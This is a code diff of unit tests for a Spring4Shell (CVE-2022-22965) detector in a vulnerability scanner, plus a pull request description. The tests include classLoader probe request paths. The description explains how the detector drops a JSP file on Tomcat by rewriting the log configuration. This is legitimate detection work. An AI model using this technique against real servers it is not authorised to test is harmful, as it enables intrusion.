-              Arrays.fill(bytes, (byte) 0xFF);
-            }
-          };
+      new SecureRandom() {
+        @Override
+        public void nextBytes(byte[] bytes) {
+          Arrays.fill(bytes, (byte) 0xFF);
+        }
+      };
 
-  private final static String MOCK_PAYLOAD_EXECUTION = "TSUNAMI_PAYLOAD_STARTffffffffffffffffTSUNAMI_PAYLOAD_END";
+  private static final String MOCK_PAYLOAD_EXECUTION =
+      "TSUNAMI_PAYLOAD_STARTffffffffffffffffTSUNAMI_PAYLOAD_END";
 
   @Before
   public void setUp() {
@@ -89,12 +90,12 @@ public final class SpringCve202222965DetectorTest {
     Guice.createInjector(
             new FakeUtcClockModule(fakeUtcClock),
             FakePayloadGeneratorModule.builder()
-                    .setCallbackServer(null)
-                    .setSecureRng(testSecureRandom)
-                    .build(),
+                .setCallbackServer(null)
+                .setSecureRng(testSecureRandom)
+                .build(),
             new HttpClientModule.Builder().build(),
             Modules.override(new SpringCve202222965DetectorBootstrapModule())
-                    .with(BoundFieldModule.of(this)))
+                .with(BoundFieldModule.of(this)))
         .injectMembers(this);
   }
 
@@ -105,7 +106,8 @@ public final class SpringCve202222965DetectorTest {
 
   @Test
   public void detect_whenVulnerable_returnsVulnerability() throws IOException {
-    mockWebServer.setDispatcher(new VulnerabilityEndpointDispatcher(this.fakeJspPath, MOCK_PAYLOAD_EXECUTION));
+    mockWebServer.setDispatcher(
+        new VulnerabilityEndpointDispatcher(this.fakeJspPath, MOCK_PAYLOAD_EXECUTION));
     mockWebServer.start();
     NetworkService service =
         NetworkService.newBuilder()
@@ -182,26 +184,27 @@ public final class SpringCve202222965DetectorTest {
     We simulate a false positive by returning an incorrect response in the
     (supposedly) uploaded JSP page.
      */
-    mockWebServer.setDispatcher(new VulnerabilityEndpointDispatcher(this.fakeJspPath, "This is not the page you're looking for."));
+    mockWebServer.setDispatcher(
+        new VulnerabilityEndpointDispatcher(
+            this.fakeJspPath, "This is not the page you're looking for."));
     mockWebServer.start();
     NetworkService service =
-            NetworkService.newBuilder()
-                    .setNetworkEndpoint(
-                            forHostnameAndPort(mockWebServer.getHostName(), mockWebServer.getPort()))
-                    .setTransportProtocol(TransportProtocol.TCP)
-                    .setSoftware(Software.newBuilder().setName("http"))
-                    .setServiceName("http")
-                    .build();
+        NetworkService.newBuilder()
+            .setNetworkEndpoint(
+                forHostnameAndPort(mockWebServer.getHostName(), mockWebServer.getPort()))
+            .setTransportProtocol(TransportProtocol.TCP)
+            .setSoftware(Software.newBuilder().setName("http"))
+            .setServiceName("http")
+            .build();
     TargetInfo targetInfo =
-            TargetInfo.newBuilder()
-                    .addNetworkEndpoints(forHostname(mockWebServer.getHostName()))
-                    .build();
+        TargetInfo.newBuilder()
+            .addNetworkEndpoints(forHostname(mockWebServer.getHostName()))
+            .build();
 
     DetectionReportList detectionReports = detector.detect(targetInfo, ImmutableList.of(service));
 
     assertThat(detectionReports.getDetectionReportsList()).isEmpty();
   }
-
 
   static final class SafeEndpointDispatcher extends Dispatcher {
 
@@ -214,6 +217,7 @@ public final class SpringCve202222965DetectorTest {
   static final class VulnerabilityEndpointDispatcher extends Dispatcher {
     private final String jspPath;
     private final String jspResponse;
+
     VulnerabilityEndpointDispatcher(String jspPath, String jspResponse) {
       this.jspPath = jspPath;
       this.jspResponse = jspResponse;

--- a/community/detectors/spring_framework_cve_2022_22965/src/test/java/com/google/tsunami/plugins/detectors/spring4shell/SpringCve202222965DetectorTest.java
+++ b/community/detectors/spring_framework_cve_2022_22965/src/test/java/com/google/tsunami/plugins/detectors/spring4shell/SpringCve202222965DetectorTest.java
@@ -1,5 +1,5 @@
 /*
- * Copyright 2022 Google LLC
+ * Copyright 2025 Google LLC
  *
  * Licensed under the Apache License, Version 2.0 (the "License");
  * you may not use this file except in compliance with the License.
@@ -13,19 +13,25 @@
  * See the License for the specific language governing permissions and
  * limitations under the License.
  */
-package com.google.tsunami.plugins.detectors.spring;
+package com.google.tsunami.plugins.detectors.spring4shell;
 
 import static com.google.common.truth.extensions.proto.ProtoTruth.assertThat;
 import static com.google.tsunami.common.data.NetworkEndpointUtils.forHostname;
 import static com.google.tsunami.common.data.NetworkEndpointUtils.forHostnameAndPort;
+import static com.google.tsunami.plugins.detectors.spring4shell.Annotations.DelayBetweenRequests;
+import static com.google.tsunami.plugins.detectors.spring4shell.SpringCve202222965Detector.JSP_FILENAME_PREFIX;
 
 import com.google.common.collect.ImmutableList;
 import com.google.inject.Guice;
+import com.google.inject.testing.fieldbinder.Bind;
+import com.google.inject.testing.fieldbinder.BoundFieldModule;
+import com.google.inject.util.Modules;
 import com.google.protobuf.util.Timestamps;
 import com.google.tsunami.common.net.http.HttpClientModule;
 import com.google.tsunami.common.net.http.HttpStatus;
 import com.google.tsunami.common.time.testing.FakeUtcClock;
 import com.google.tsunami.common.time.testing.FakeUtcClockModule;
+import com.google.tsunami.plugin.payload.testing.FakePayloadGeneratorModule;
 import com.google.tsunami.proto.DetectionReport;
 import com.google.tsunami.proto.DetectionReportList;
 import com.google.tsunami.proto.DetectionStatus;
@@ -37,7 +43,9 @@ import com.google.tsunami.proto.TransportProtocol;
 import com.google.tsunami.proto.Vulnerability;
 import com.google.tsunami.proto.VulnerabilityId;
 import java.io.IOException;
+import java.security.SecureRandom;
 import java.time.Instant;
+import java.util.Arrays;
 import javax.inject.Inject;
 import okhttp3.mockwebserver.Dispatcher;
 import okhttp3.mockwebserver.MockResponse;
@@ -56,17 +64,37 @@ public final class SpringCve202222965DetectorTest {
   private final FakeUtcClock fakeUtcClock =
       FakeUtcClock.create().setNow(Instant.parse("2020-01-01T00:00:00.00Z"));
 
+  private final String fakeJspPath = "/" + JSP_FILENAME_PREFIX + fakeUtcClock.millis() + ".jsp";
+
+  @Bind(lazy = true)
+  @DelayBetweenRequests
+  private final int delayBetweenRequests = 0;
+
   @Inject private SpringCve202222965Detector detector;
 
   private MockWebServer mockWebServer;
+  private final SecureRandom testSecureRandom =
+          new SecureRandom() {
+            @Override
+            public void nextBytes(byte[] bytes) {
+              Arrays.fill(bytes, (byte) 0xFF);
+            }
+          };
+
+  private final static String MOCK_PAYLOAD_EXECUTION = "TSUNAMI_PAYLOAD_STARTffffffffffffffffTSUNAMI_PAYLOAD_END";
 
   @Before
   public void setUp() {
     mockWebServer = new MockWebServer();
     Guice.createInjector(
             new FakeUtcClockModule(fakeUtcClock),
-            new SpringCve202222965DetectorBootstrapModule(),
-            new HttpClientModule.Builder().build())
+            FakePayloadGeneratorModule.builder()
+                    .setCallbackServer(null)
+                    .setSecureRng(testSecureRandom)
+                    .build(),
+            new HttpClientModule.Builder().build(),
+            Modules.override(new SpringCve202222965DetectorBootstrapModule())
+                    .with(BoundFieldModule.of(this)))
         .injectMembers(this);
   }
 
@@ -77,7 +105,7 @@ public final class SpringCve202222965DetectorTest {
 
   @Test
   public void detect_whenVulnerable_returnsVulnerability() throws IOException {
-    mockWebServer.setDispatcher(new VulnerabilityEndpointDispatcher());
+    mockWebServer.setDispatcher(new VulnerabilityEndpointDispatcher(this.fakeJspPath, MOCK_PAYLOAD_EXECUTION));
     mockWebServer.start();
     NetworkService service =
         NetworkService.newBuilder()
@@ -148,6 +176,33 @@ public final class SpringCve202222965DetectorTest {
     assertThat(detectionReports.getDetectionReportsList()).isEmpty();
   }
 
+  @Test
+  public void detect_whenFalsePositive_returnsNoVulnerability() throws IOException {
+    /*
+    We simulate a false positive by returning an incorrect response in the
+    (supposedly) uploaded JSP page.
+     */
+    mockWebServer.setDispatcher(new VulnerabilityEndpointDispatcher(this.fakeJspPath, "This is not the page you're looking for."));
+    mockWebServer.start();
+    NetworkService service =
+            NetworkService.newBuilder()
+                    .setNetworkEndpoint(
+                            forHostnameAndPort(mockWebServer.getHostName(), mockWebServer.getPort()))
+                    .setTransportProtocol(TransportProtocol.TCP)
+                    .setSoftware(Software.newBuilder().setName("http"))
+                    .setServiceName("http")
+                    .build();
+    TargetInfo targetInfo =
+            TargetInfo.newBuilder()
+                    .addNetworkEndpoints(forHostname(mockWebServer.getHostName()))
+                    .build();
+
+    DetectionReportList detectionReports = detector.detect(targetInfo, ImmutableList.of(service));
+
+    assertThat(detectionReports.getDetectionReportsList()).isEmpty();
+  }
+
+
   static final class SafeEndpointDispatcher extends Dispatcher {
 
     @Override
@@ -157,18 +212,31 @@ public final class SpringCve202222965DetectorTest {
   }
 
   static final class VulnerabilityEndpointDispatcher extends Dispatcher {
+    private final String jspPath;
+    private final String jspResponse;
+    VulnerabilityEndpointDispatcher(String jspPath, String jspResponse) {
+      this.jspPath = jspPath;
+      this.jspResponse = jspResponse;
+    }
 
     @Override
     public MockResponse dispatch(RecordedRequest recordedRequest) {
-      if ("/?class.module.classLoader.DefaultAssertionStatus=1".equals(recordedRequest.getPath())) {
+      String path = recordedRequest.getPath();
+      if (path.equals("/?class.module.classLoader.DefaultAssertionStatus=1")) {
+        // Handle preliminary check 1
         return new MockResponse().setResponseCode(HttpStatus.OK.code());
-      }
-      if ("/?class.module.classLoader.DefaultAssertionStatus=2".equals(recordedRequest.getPath())) {
+      } else if (path.equals("/?class.module.classLoader.DefaultAssertionStatus=2")) {
+        // Handle preliminary check 2
         return new MockResponse().setResponseCode(HttpStatus.BAD_REQUEST.code());
+      } else if (path.startsWith(jspPath)) {
+        // Handle requests to the uploaded
+        return new MockResponse().setResponseCode(HttpStatus.OK.code()).setBody(jspResponse);
+      } else if (path.startsWith("/?")) {
+        // Handle requests during JSP upload step
+        return new MockResponse().setResponseCode(HttpStatus.OK.code());
+      } else {
+        return new MockResponse().setResponseCode(HttpStatus.NOT_FOUND.code());
       }
-      return new MockResponse()
-          .setResponseCode(HttpStatus.OK.code())
-          .setBody("<p><href=\"http://127.0.0.1:8889/\"></p>");
     }
   }
 }


### PR DESCRIPTION
Hello!

This PR implements better detection logic for the Spring4Shell (CVE-2022-22965) vulnerability.

Also added a testbed here: https://github.com/google/security-testbeds/pull/121

## Details

Previously, the detector checked the response of two HTTP requests to determine whether a target was vulnerable, but this lead to false positives.

The new implementation still uses the old logic as a preliminary check to find potentially vulnerable pages, on which the full exploit is then attempted. The exploit consists of changing the log configuration in order to drop a `.jsp` file in Tomcat's `ROOT` webapp directory.

The dropped `.jsp` has a randomized name and simply prints out a string generated using Tsunami's `PayloadGenerator`. There is also some extra code which make the script self-delete when visited with the `delete=1` URL parameter.

After dropping the `.jsp` file, the log configuration is also set to point to `/dev/null`, in order to prevent more files to be accidentally created and left on the server.